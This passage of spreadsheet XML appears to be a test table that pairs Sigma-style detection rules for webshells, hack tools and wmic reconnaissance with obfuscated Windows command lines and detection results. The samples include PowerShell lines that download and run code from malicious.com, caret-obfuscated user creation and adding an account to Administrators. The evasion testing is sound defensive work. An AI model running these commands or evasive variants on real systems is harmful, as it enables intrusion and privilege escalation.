      </c>
      <c r="C71" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D71" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E71" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C "&amp;wh^oami&amp;ec^ho"</t>
        </is>
      </c>
      <c r="F71" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G71" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H71" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I71" s="43" t="n"/>
      <c r="J71" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K71" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="72" ht="15.75" customHeight="1" s="42">
      <c r="A72" s="43" t="n"/>
      <c r="B72" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C72" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D72" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E72" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "n^e^t u^s^e^r t^e^s^t^u^s^e^r P^a^s^s^w^o^r^d /a^d^d"</t>
        </is>
      </c>
      <c r="F72" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G72" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H72" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I72" s="36" t="n"/>
      <c r="J72" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K72" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="73" ht="15.75" customHeight="1" s="42">
      <c r="A73" s="43" t="n"/>
      <c r="B73" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C73" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D73" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E73" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F73" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G73" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H73" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I73" s="43" t="n"/>
      <c r="J73" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K73" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="74" ht="15.75" customHeight="1" s="42">
      <c r="A74" s="43" t="n"/>
      <c r="B74" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C74" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D74" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E74" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F74" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G74" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H74" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I74" s="36" t="n"/>
      <c r="J74" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K74" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="75" ht="15.75" customHeight="1" s="42">
      <c r="A75" s="43" t="n"/>
      <c r="B75" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C75" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D75" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E75" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -NoproFILe -"Command" "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F75" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G75" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H75" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I75" s="43" t="n"/>
      <c r="J75" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K75" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="76" ht="15.75" customHeight="1" s="42">
      <c r="A76" s="43" t="n"/>
      <c r="B76" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C76" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D76" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E76" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" -COMmAND "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F76" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G76" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H76" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I76" s="43" t="n"/>
      <c r="J76" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K76" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="77" ht="15.75" customHeight="1" s="42">
      <c r="A77" s="43" t="n"/>
      <c r="B77" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C77" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D77" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E77" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" -cOMmAnd "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F77" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G77" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H77" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I77" s="43" t="n"/>
      <c r="J77" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K77" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="78" ht="15.75" customHeight="1" s="42">
      <c r="A78" s="43" t="n"/>
      <c r="B78" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C78" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D78" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E78" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"NoProfile" -coMmaND "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F78" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G78" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H78" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I78" s="43" t="n"/>
      <c r="J78" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K78" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="79" ht="15.75" customHeight="1" s="42">
      <c r="A79" s="43" t="n"/>
      <c r="B79" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C79" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D79" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E79" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -noProFile -"Command" "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F79" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G79" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H79" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I79" s="43" t="n"/>
      <c r="J79" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K79" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="80" ht="15.75" customHeight="1" s="42">
      <c r="A80" s="43" t="n"/>
      <c r="B80" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C80" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D80" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E80" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"ec" JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F80" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G80" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H80" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I80" s="36" t="n"/>
      <c r="J80" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K80" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="81" ht="15.75" customHeight="1" s="42">
      <c r="A81" s="43" t="n"/>
      <c r="B81" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C81" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D81" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E81" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F81" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G81" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H81" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I81" s="36" t="n"/>
      <c r="J81" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K81" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="82" ht="15.75" customHeight="1" s="42">
      <c r="A82" s="43" t="n"/>
      <c r="B82" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C82" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D82" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E82" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /C "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F82" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G82" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H82" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I82" s="43" t="n"/>
      <c r="J82" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K82" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="83" ht="15.75" customHeight="1" s="42">
      <c r="A83" s="43" t="n"/>
      <c r="B83" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C83" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D83" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E83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83" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G83" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H83" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I83" s="43" t="n"/>
      <c r="J83" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K83" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="84" ht="15.75" customHeight="1" s="42">
      <c r="A84" s="43" t="n"/>
      <c r="B84" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C84" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D84" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E84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84" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G84" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H84" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I84" s="43" t="n"/>
      <c r="J84" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K84" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="85" ht="15.75" customHeight="1" s="42">
      <c r="A85" s="43" t="n"/>
      <c r="B85" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C85" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D85" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E85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85" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G85" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H85" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I85" s="43" t="n"/>
      <c r="J85" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K85" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="86" ht="15.75" customHeight="1" s="42">
      <c r="A86" s="43" t="n"/>
      <c r="B86" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C86" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D86" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E86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86" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G86" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H86" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I86" s="43" t="n"/>
      <c r="J86" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K86" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="87" ht="15.75" customHeight="1" s="42">
      <c r="A87" s="43" t="n"/>
      <c r="B87" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C87" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D87" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E87" s="36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87" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G87" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H87" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I87" s="36" t="n"/>
      <c r="J87" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K87" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="88" ht="15.75" customHeight="1" s="42">
      <c r="A88" s="43" t="n"/>
      <c r="B88" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C88" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D88" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E88" s="36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F88" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G88" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H88" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I88" s="36" t="n"/>
      <c r="J88" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K88" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="89" ht="15.75" customHeight="1" s="42">
      <c r="A89" s="43" t="n"/>
      <c r="B89" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C89" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D89" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E89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89" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G89" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H89" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I89" s="36" t="n"/>
      <c r="J89" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K89" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="90" ht="15.75" customHeight="1" s="42">
      <c r="A90" s="43" t="n"/>
      <c r="B90" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_all_execution</t>
        </is>
      </c>
      <c r="C90" s="36" t="inlineStr">
        <is>
          <t>Enumerate All Information With Whoami.EXE</t>
        </is>
      </c>
      <c r="D90" s="36" t="inlineStr">
        <is>
          <t>c248c896-e412-4279-8c15-1c558067b6fa</t>
        </is>
      </c>
      <c r="E90" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[Security.Principal.WindowsIdentity]::GetCurrent().Groups | ForEach-Object { $_.Translate([System.Security.Principal.NTAccount]) }"</t>
        </is>
      </c>
      <c r="F90" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G90" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H90" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I90" s="43" t="n"/>
      <c r="J90" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K90" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="91" ht="15.75" customHeight="1" s="42">
      <c r="A91" s="43" t="n"/>
      <c r="B91" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C91" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D91" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E91" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F91" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G91" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H91" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I91" s="43" t="n"/>
      <c r="J91" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K91" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="92" ht="15.75" customHeight="1" s="42">
      <c r="A92" s="43" t="n"/>
      <c r="B92" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C92" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D92" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E92" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F92" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G92" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H92" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I92" s="43" t="n"/>
      <c r="J92" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K92" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="93" ht="15.75" customHeight="1" s="42">
      <c r="A93" s="43" t="n"/>
      <c r="B93" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advanced_ip_scanner</t>
        </is>
      </c>
      <c r="C93" s="36" t="inlineStr">
        <is>
          <t>PUA - Advanced IP Scanner Execution</t>
        </is>
      </c>
      <c r="D93" s="36" t="inlineStr">
        <is>
          <t>bef37fa2-f205-4a7b-b484-0759bfd5f86f</t>
        </is>
      </c>
      <c r="E93" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "copy C:\Tools\advanced_ip_scanner.exe C:\Temp\audit.exe &amp; C:\Temp\audit.exe"</t>
        </is>
      </c>
      <c r="F93" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G93" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H93" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I93" s="43" t="n"/>
      <c r="J93" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K93" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="94" ht="15.75" customHeight="1" s="42">
      <c r="A94" s="43" t="n"/>
      <c r="B94" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_computersystem</t>
        </is>
      </c>
      <c r="C94" s="36" t="inlineStr">
        <is>
          <t>Computer System Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D94" s="36" t="inlineStr">
        <is>
          <t>9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f</t>
        </is>
      </c>
      <c r="E94" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" /"WindowStyle" Hidden -COMManD "Get-CimInstance -ClassName Win32_ComputerSystem | Select-Object Domain, Username, Model"</t>
        </is>
      </c>
      <c r="F94" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G94" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H94" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I94" s="43" t="n"/>
      <c r="J94" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K94" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="95" ht="15.75" customHeight="1" s="42">
      <c r="A95" s="43" t="n"/>
      <c r="B95" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C95" s="36" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D95" s="36" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E95" s="36" t="inlineStr">
        <is>
          <t>wmic.exe /nAmEspACe:\rooT\CImv2 Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F95" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G95" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H95" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I95" s="43" t="n"/>
      <c r="J95" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K95" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="96" ht="15.75" customHeight="1" s="42">
      <c r="A96" s="43" t="n"/>
      <c r="B96" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C96" s="36" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D96" s="36" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E96" s="36" t="inlineStr">
        <is>
          <t>wmic.exe /nAmesPace:\RooT\CImV2 Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F96" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G96" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H96" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I96" s="43" t="n"/>
      <c r="J96" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K96" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="97" ht="15.75" customHeight="1" s="42">
      <c r="A97" s="43" t="n"/>
      <c r="B97" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C97" s="36" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D97" s="36" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E97" s="36" t="inlineStr">
        <is>
          <t>wmic.exe /nAmESPACE:\root\cimv2 Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F97" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G97" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H97" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I97" s="43" t="n"/>
      <c r="J97" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K97" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="98" ht="15.75" customHeight="1" s="42">
      <c r="A98" s="43" t="n"/>
      <c r="B98" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C98" s="36" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D98" s="36" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E98" s="36" t="inlineStr">
        <is>
          <t>wmic.exe /"Namespace:\root\CIMV2" Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F98" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G98" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H98" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I98" s="43" t="n"/>
      <c r="J98" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K98" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="99" ht="15.75" customHeight="1" s="42">
      <c r="A99" s="43" t="n"/>
      <c r="B99" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_product_class</t>
        </is>
      </c>
      <c r="C99" s="36" t="inlineStr">
        <is>
          <t>Potential Product Class Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D99" s="36" t="inlineStr">
        <is>
          <t>e568650b-5dcd-4658-8f34-ded0b1e13992</t>
        </is>
      </c>
      <c r="E99" s="36" t="inlineStr">
        <is>
          <t>wmic.exe -"Namespace:\root\CIMV2" Path Win32_Process Get Name</t>
        </is>
      </c>
      <c r="F99" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G99" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H99" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I99" s="43" t="n"/>
      <c r="J99" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K99" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="100" ht="15.75" customHeight="1" s="42">
      <c r="A100" s="43" t="n"/>
      <c r="B100" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_volume</t>
        </is>
      </c>
      <c r="C100" s="36" t="inlineStr">
        <is>
          <t>System Disk And Volume Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D100" s="36" t="inlineStr">
        <is>
          <t>c79da740-5030-45ec-a2e0-479e824a562c</t>
        </is>
      </c>
      <c r="E100" s="36" t="inlineStr">
        <is>
          <t>wmic.exe fsdir where "drive='C:'" get name,filesize</t>
        </is>
      </c>
      <c r="F100" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G100" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H100" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I100" s="43" t="n"/>
      <c r="J100" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K100" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="101" ht="15.75" customHeight="1" s="42">
      <c r="A101" s="36" t="n"/>
      <c r="B101" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_recon_volume</t>
        </is>
      </c>
      <c r="C101" s="36" t="inlineStr">
        <is>
          <t>System Disk And Volume Reconnaissance Via Wmic.EXE</t>
        </is>
      </c>
      <c r="D101" s="36" t="inlineStr">
        <is>
          <t>c79da740-5030-45ec-a2e0-479e824a562c</t>
        </is>
      </c>
      <c r="E101" s="36" t="inlineStr">
        <is>
          <t>wmic.exe partition get name,size</t>
        </is>
      </c>
      <c r="F101" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G101" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H101" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I101" s="43" t="n"/>
      <c r="J101" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K101" s="36" t="b">
        <v>0</v>
      </c>
    </row>
